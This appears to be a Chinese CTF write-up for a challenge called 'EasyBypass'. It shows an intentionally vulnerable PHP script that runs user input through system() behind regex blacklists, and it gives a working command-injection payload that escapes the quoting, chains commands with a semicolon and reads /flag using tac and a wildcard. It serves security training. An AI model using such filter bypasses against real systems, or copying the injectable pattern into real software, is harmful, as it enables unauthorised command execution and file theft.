[CTFHUB]EasyBypass
思路
<?php
highlight_file(__FILE__);
$comm1 = $_GET['comm1'];
$comm2 = $_GET['comm2'];
if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1))
$comm1 = "";
if(preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||ls|\||tail|more|cat|string|bin|less||tac|sh|flag|find|grep|echo|w/is", $comm2))
$comm2 = "";
$flag = "#flag in /flag";
$comm1 = '"' . $comm1 . '"';
$comm2 = '"' . $comm2 . '"';
$cmd = "file $comm1 $comm2";
system($cmd);
?>
cannot open `' (No such file or directory) cannot open `' (No such file or directory)解题
comm1的过滤力度和comm2不一样,comm1可以构造tac读文件
- 用
"闭合$comm1 = '"' . $comm1 . '"'; - 用
;闭合之前的file命令和当前命令,file命令就算执行错误也不会影响其他命令 - 用
?来通配单个字符
comm1:
comm2:
payload:
/?comm1=";tac%20/fla?;"&comm2=1注意
Linux命令的多命令执行(;)
Linux读文件(tac)
Linux命令通配符(?)